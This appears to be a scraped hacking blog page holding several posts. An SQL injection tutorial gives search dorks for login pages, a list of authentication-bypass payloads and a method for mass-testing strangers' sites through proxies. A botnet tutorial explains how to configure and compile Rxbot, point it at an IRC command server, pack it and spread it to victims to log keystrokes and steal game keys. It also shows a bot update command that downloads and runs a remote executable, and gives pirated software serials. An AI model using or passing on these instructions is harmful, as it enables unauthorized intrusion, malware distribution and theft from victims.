This is default featured slide 1 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 2 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

What is SQL Injection and How to do It

By Anonymous February 04, 2012  No comments
One of the major problems with SQL is its poor security issues surrounding is the login and url strings.
this tutorial is not going to go into detail on why these string work as am not a coder i just know what i know and it works

SEARCH:

admin\login.asp
login.asp

with these two search string you will have plenty of targets to chose from...finding one thats vulnerable is another question


WHAT I DO :

first let me go into details on how i go about my research

i have gathered plenty of injection strings for quite some time like these below and have just been granted access to a test machine and will be testing for many variations and new inputs...legally cool...provided by my good friend Gsecur aka ICE..also an Astal member.. http://governmentsecurity.org"thanks mate" .. gives me a chance to concentrate on what am doing and not be looking over my shoulder

INJECTION STRINGS:HOW ?

this is the easiest part...very simple

on the login page just enter something like

user:admin (you dont even have to put this.)
pass:' or 1=1--

or

user:' or 1=1--
admin:' or 1=1--

some sites will have just a password so

password:' or 1=1--

infact i have compiled a combo list with strings like this to use on my chosen targets ....there are plenty of strings about , the list below is a sample of the most common used

there are many other strings involving for instance UNION table access via reading the error pages table structure
thus an attack with this method will reveal eventually admin U\P paths...but thats another paper

the one am interested in are quick access to targets

PROGRAM

i tried several programs to use with these search strings and upto now only Ares has peformed well with quite a bit
of success with a combo list formatted this way,yesteday i loaded 40 eastern targets with 18 positive hits in a few minutes
how long would it take to go thought 40 sites cutting and pasting each string ??

combo example:

admin:' or a=a--
admin:' or 1=1--

and so on...it dont have to be admin can be anything you want... the most important part is example:' or 1=1-- this is our injection
string

now the only trudge part is finding targets to exploit...so i tend to search say google for login.asp or whatever

inurl:login.asp
index of:/admin/login.asp

like this: index of login.asp

result:

http://www3.google.com/search?hl=en&ie=ISO...G=Google+Search

17,000 possible targets trying various searches spews out plent more


now using proxys set in my browser i then click through interesting targets...seeing whats what on the site pages if interesting
i then cut and paste url as a possible target...after an hour or so you have a list of sites of potential targets like so

http://www.somesite.com/login.asp
http://www.another.com/admin/login.asp

and so on...in a couple of hours you can build up quite a list...reason i dont sellect all results or spider for login pages is
i want to keep the noise level low...my ISP.. well enough said...plus atm am on dial-up so to slow for me

i then save the list fire up Ares and enter (1) a proxy list (2)my target IP list (3)my combo list...start..now i dont want to go into
problems with users using Ares..thing is i know it works for me...

sit back and wait...any target vulnerable with show up in the hits box...now when it finds a target it will spew all the strings on that site as vulnerable...you have to go through each one on the site by cutting and pasting the string till you find the right one..but the thing is you know you CAN access the site ...really i need a program that will return the hit with a click on url and ignore false outputs

am still looking....thing is it saves quite a bit of time going to each site and each string to find its not exploitable.

there you go you should have access to your vulnerable target by now

another thing you can use the strings in the urls were user=? edit the url to the = part and paste ' or 1=1-- so it becomes

user=' or 1=1-- just as quick as login process


(Variations)

admin'--

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

hi") or ("a"="a

happy hacking
Read More

Wordpress Hack : Find all the plugins being used on a WP blog

By Anonymous February 04, 2012  No comments
Plugins enhance the functionality of Wordpress. Plugins are very important for any blogger who wishes to make his/her blog a success. Its the same reason why no blogger would like to reveal what all plugins he/she uses.

Here’s a simple wordpress hack through which you can find ALL the plugins being used on a wordpress blog. It wont work on all but will work for most.


  1. Identify your victim. Let’s say http://www.example.com


  2. In the address bar type the following : http://www.example.com/wp-content/plugins


You should get the list of plugins being used as a directory structure!

The workaround this is to disable directory viewing in their hosting control panels or by adding the following line to the .htaccess file :

Options –Indexes

This returns a 403 error to the user.
Read More

CRACKING DOS FILES

By Anonymous October 11, 2010  No comments
This summary is not available. Please click here to view the post.
Read More

HACKING WEBSITE

By Anonymous September 26, 2010  No comments

Hacking → Introduction

What is hacking?


Hacking used to be defined as "One who is proficient at using or programming a computer; a computer buff." However, this use has been turned around now, to mean that of a cracker - "One who uses programming skills to gain illegal access to a computer network or file." This information is about this second meaning, cracking. Before we begin I would like to point out that hackers HATE crackers, crackers have given them a bad name.


The main differences between the two are that hackers try to make things, crackers try to break things. Hackers made the Internet what it is today. Hackers program websites (among other things) and they do not try and harm the work of others as is thought in todays society. However, as the word hacker is now in such popular use that it is thought it means cracker - I will use the words hacking and cracking for describing these cracking methods.


Hacking is not a simple operation or sequence of commands as many people think. Hacking is a skill. To hack you must change and adapt your approach depending on the obstacles you come across. Hacking is not a specific term, there are many types of hacking. On this site I will discuss and explain the different types of hacking and demonstrate some basic tools.

Why hack?


Some people, known as crackers, get a kick out of harming people, their work, and their websites. But the real hackers get a kick out of programming, improving and helping the web, the difference is enormous. Crackers sometimes hack into websites in order to prove they can - that is sad. Cracking is a term also given to those who try to break software in order to make them free or distribute them, this is the same group of sad people.

What are the different types of hacking?

There are three main types:

  1. Hacking into hidden or password protected pages of a website.
  2. Hacking into other people's computers while they are online.
  3. Hacking into company servers to read important information or distribute viruses.

Which is worse?

Although they are all illegal Number 1 is the least serious and the most commonly practised. This is because it is so easy and some areas are legal. There are also many tools on the internet which encourage these practices. If you are making your own website then the "Protect your website" section will be of particular interest.

Where is hacking illegal?


Hacking is illegal in most countries because of the invasion of privacy which can occur from hacking. The other main issue is damage, either manually or through viruses. Deleting specific files can render a computer useless in a matter of minutes. There are some countries or states which do not press charges for hacking because they consider it just another advance in computer technology. However, even if you live in a state where hacking is legal (which is unlikely), unless the company, website, or indivual is based in that country you must abide by international rules.

Why do people hack?


To most there appears to be no reason why hackers should spread viruses and try and destroy companies' computers merely because they can. However it is clear that hackers enjoy what they do. There are a number of hacking tournaments around the world each year and during these tournaments companies monitor there systems 24 hours a day. Recently there was a Hackers Challenge lasting 6 hours.

Is hacking servers always the same?


It's is easier to hack Windows than Linux and easier to hack with Linux. This is because Linux is designed to allow the user to issue any commands they want to. Most companies install firewalls and virus filters to try and prevent hackers from breaking in.


Hacking → Website Hacking

Introduction


There are two types of website hacking:

  1. Hacking to break into password protected sections of the website. (Often Illegal)
  2. Hacking so that you can modify or deform a website. NOTE: Criminal Offence


Website Hacking is not uncommon. It is simply trying to break into a site unauthorised. Webmasters can use encryption to prevent this. However, as most website programmers do not use encryption their websites are easy targets. Methods of protection include javascript, asp, php and cgi, but most other server-side languages can also be used. I will show you how to hack websites which use javascript protection.


Javascript protection has never been secure, if you are looking at the source to find the password to client-side protection, you will probably not have any problem finding the password unless it is encrypted. Follow the steps below so that you can understand the basics of hacking websites.


Recently 2 dummy bank sites were launched, the first totally insecure and the second was secured with a firewall. 8 weeks later, both sites were checked. The first without a firewall, averaged a hacking attempt every four minutes, the second, with a firewall, averaged an attack every hour. This just goes to prove how malicious some hackers are.


On this website you will find nothing of such a malicious nature. Building positive white hat hacking skills is a good thing and we encourage it, as do we helping you protect your own site, but bad hat hackers should find a better hobby.


Read More
By Anonymous September 26, 2010  No comments

Hacker may refer to:



Computing and technology



Similar meanings in other fields are:


  • Media hacker, someone who uses the media in new ways
  • Reality hacker, similar to a computer hacker, but hacks the "real world"
  • Wetware hacker, one who experiments with biological materials
  • Somebody who generally works 'outside the box'.


Entertainment




People named Hacker



[edit] Real




Fictional




Other definitions


Hacker may also refer to:



New York street sign, c. 1963


New York street sign, c. 1963





See also




References



  1. ^ Sue Montgomery (Sunday, 17 February 2008), The Hacker: I might be off my trolley but being a caddy is certainly my bag, <http://www.independent.co.uk/sport/golf/the-hacker-i-might-be-off-my-trolley-but-being-a-caddy-is-certainly-my-bag-783323.html> 


Read More

Rediff.com Goes Mobile

By Anonymous September 26, 2010  No comments

Offering Indian mobile phone users a near web like experience of Rediff.com services on their mobile handsets the company has gone live with its mobile client application 'MobileRediff'. This mobile application allows mobile phone users to check latest news updates, access popular Rediff.com services and enjoy real-time access to Rediffmail. These services are integrated into one common application that can be downloaded to mobile phones.



The simple interface of the service allows users to preview email attachments, share files as attachments from mobile phones and also enables users to back up their mobile phone contacts onto the Rediffmail address book. This application also allows users to send and receive Hindi language email and SMS messages. Users can also access and download SMS based content services like ringtones, wallpapers, caller back tones and jokes.





Commenting on the initiative, Uday Sodhi Senior Vice President Interactive services Rediff.com said, "With MobileRediff application we have focused on offering mobile phone users a simple and easy to use interface to access popular Rediff.com's webservices We believe that the ease of use and functionality of the MobileRediff application will appeal to mobile users across India and help make Rediff.com accessible to millions of consumers around the country who do not have access to personal computers."



MobileRediff application is compatible with all leading GPRS enabled mobile handsets and can be accessed at mobile.rediff.com. Users can also download the client directly onto their mobile devices by sending an SMS to 57333. Users can also log on to http://mr.rediff.com for a demo of the application and its functionality.


Read More

How To Create And Compile Botnets To Autohack 1000ds of Systems

By Anonymous September 03, 2010  No comments
 i found a nice tut that helps u with the basics of the botnets
In addition to Rxbot 7.6 modded in this tutorial, you can also use another good source. It is rx-asn-2-re-worked v3 is a stable mod of rxbot and it is 100% functional and not crippled. If you want to download it, you can below:



Download

Compiling is the same as it would be with Rxbot 7.6. I prefer this source but it would ultimately be best to compile your own bot/get a private one.



Q:What is a botnet?

A: A botnet is where you send a trojan to someone and when they open it a "bot" joins your channel on IRC(secretly, they don't know this)Once done the computer is now refered to as a "zombie".

Depending on the source you used, the bot can do several things.

I myself have helped write one of the most advanced and secure bot sources out there.

(Off topic)

But once again depending on the source you can :

Keylog their computer, take picutes of their screen, turn on their webcam and take pics/movies, harvest cdkeys and game keys or even cracks, passwords, aim screen names, emails, you can also spam, flood, DDoS, ping, packet, yada yada, some have built in md5 crackers, and clone functions to spamm other irc channels and overrun a channel and even perform IRC "Takeovers".

Once again depending on the bot it may be able to kill other fellow competeter bots.

Or even kill AV/FW apon startup.

Add itself to registry.

Open sites.

Open commands.

Cmd,

notepad,

html,

Anything is possible !



Theres the infected computers "bots" the attacker, the server, and the victim.



Quote:
while the term "botnet" can be used to refer to any group of bots, such as IRC bots, the word is generally used to refer to a collection of compromised machines running programs, usually referred to as worms, Trojan horses, or backdoors, under a common command and control infrastructure. A botnet's originator (aka "bot herder") can control the group remotely, usually through a means such as IRC, and usually for nefarious purposes. Individual programs manifest as IRC "bots". Often the command and control takes place via an IRC server or a specific channel on a public IRC network. A bot typically runs hidden, and complies with the RFC 1459 (IRC) standard. Generally, the perpetrator of the botnet has compromised a series of systems using various tools (exploits, buffer overflows, as well as others; see also RPC). Newer bots can automatically scan their environment and propagate themselves using vulnerabilities and weak passwords. Generally, the more vulnerabilities a bot can scan and propagate through, the more valuable it becomes to a botnet controller community.



Suspects in the case used the Randex worm to establish a 30,000 strong botnet used to carry out "low profile DDoS attacks" and steal the CD keys for games, he explained. "They had a huge weapon and didn't use as much as they could have done," Santorelli told El Reg. "The main damage caused in the case is down to the cost of cleaning up infected PCs."




Botnets are being used for Google Adword click fraud, according to security watchers.



Now enough with all the quotes. As you can see, you can do anything with a botnet. Anything is possible. This is my bot and tutorial. You can host your bots on irc on a public server but I would recommend a private, password protected server. I will setup bots for people if they have something to offer.

---------------

Ignore anything about using the server editor but this tutorial show how to make an irc channel and spread bots:

Download tutorial



-----------------------------

Here we go ladies and gentlemen :)

Follow the tutorial:

-----------------------------



I. Setting up the C++ compilier: (easy)



1. Download Microsoft Visual C++ 6.0 Standard Edition (63.4 mb)

Mirror 2

Mirror 3 Direct

Pass: itzforblitz

Serial: 812-2224558



2. Run setup.exe and install. Remember to input serial



3. Download and install the Service Pack 6 (60.8 mb)



4. After that Download and install:



Windows SDK (1.2 mb)

Mirror 2

Mirror 3

Pass: itzforblitz

-------------------------------------



II. Configuring the C++ compilier (easy)



1. Open up Microsoft Visual C++ Compilier 6.0

2. Go to Tools > Options and Click the "Directories" tab

3. Now, browse to these directories and add them to the list: (Click the dotted box to add)

Quote:
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK

C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\BIN

C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\INCLUDE

C:\PROGRAM FILES\MICROSOFRT PLATFORM SDK\LIB



4. Now put them in this order: (use up and down arrows)



Image

(it does not matter whats below those lines)

---------------------------------------



III. Configuring your bot: (easy)



1. Download and unpack:

Rxbot 7.6 (212.3 kb)

Mirror 2

Mirror 3



2. You should see an Rxbot 7.6 folder

3. Open the Rxbot 7.6 > configs.h folder and edit these lines only:



Quote:
Put in quotations:

char password[] = "Bot_login_pass"; // bot password (Ex: monkey)

char server[] = "aenigma.gotd.org"; // server (Ex: irc.efnet.net)

char serverpass[] = ""; // server password (not usually needed)

char channel[] = "#botz_channel"; // channel that the bot should join

char chanpass[] = "My_channel_pass"; // channel password



Optional:

char server2[] = ""; // backup server

char channel2[] = ""; // backup channel

char chanpass2[] = ""; //Backup channel pass



-----------------------------------

IV. Building your bot: (very easy)



1. Make sure Microsoft Visual C++ is open

2. Select "File > Open Workspace"

3. Browse to your Rxbot 7.6 folder and open the rBot.dsw file

4. Right Click "rBot Files" and click Build:

Image



5. rBot.exe will be in the Rxbot 7.6 > Debug folder !!!



YOUR DONE !!!! Now get the rbot and pack it (Use tool in third post and open rbot and click "Protect" and send it to some idiots, Follow tutorial on top to learn how to spread. Some good ways are: Torrents, AIM, Friends, Myspace, School computers, and P2P but there are more ways. ENJOY !

-------------------------------------

Command list

Download Command list



Basics:

.login botpassword will login bots

.logout will logout bots

.keylog on will turn keylogger on

.getcdkeys will retrieve cdkeys.

Read command list for more

-----------------------------------

Download mIRC



mIRC

Mirror 2

Mirror 3

--------------------------------------------------------------------------------------------

How to secure your bots:



Don't be an ~censored~, it is easy to steal bots. All you need is the irc server address and maybe a key.

To steal bots, watch for the @login key one must upload their bot to a direct link (tdotnetwork is execellent)

and update the channel topic and run:

Quote:
@update http://www.mybot.com/download/SMSPRO.exe 82


The http://mybot.com is your bot's download link and the 82 can be any number(s)

Now steal their bots and have them join your channel ;)

To find the server address you need their botnet. Then take their bot and open it in the server editor. Address will be shown and so will password and other needed information.



To secure your self:



It is fairly easy to secure your bots, here is how:



1. When you are in your right click on your chat window and select "Channel Modes"

2. Make sure these options are checked:



Image



This way no one besides you or another op can set the channel topic :)

Note: Setting "Moderated" is good for when you are not there because anyone who is not voiced (+v) or and op (+o) cannot talk. They will still log in and follow commands however there will be no output.

------------------------------------------------------------------------

Good IRC Servers:



I would recommend running your botnet on a private server.

If you would like to setup a botnet on a certain server, do not intrude and make one. Talk to the admin and make sure he know that the IRC server is not doing anything illegal. If an Admin refuses, don't get angry. It is his/her server after all
Read More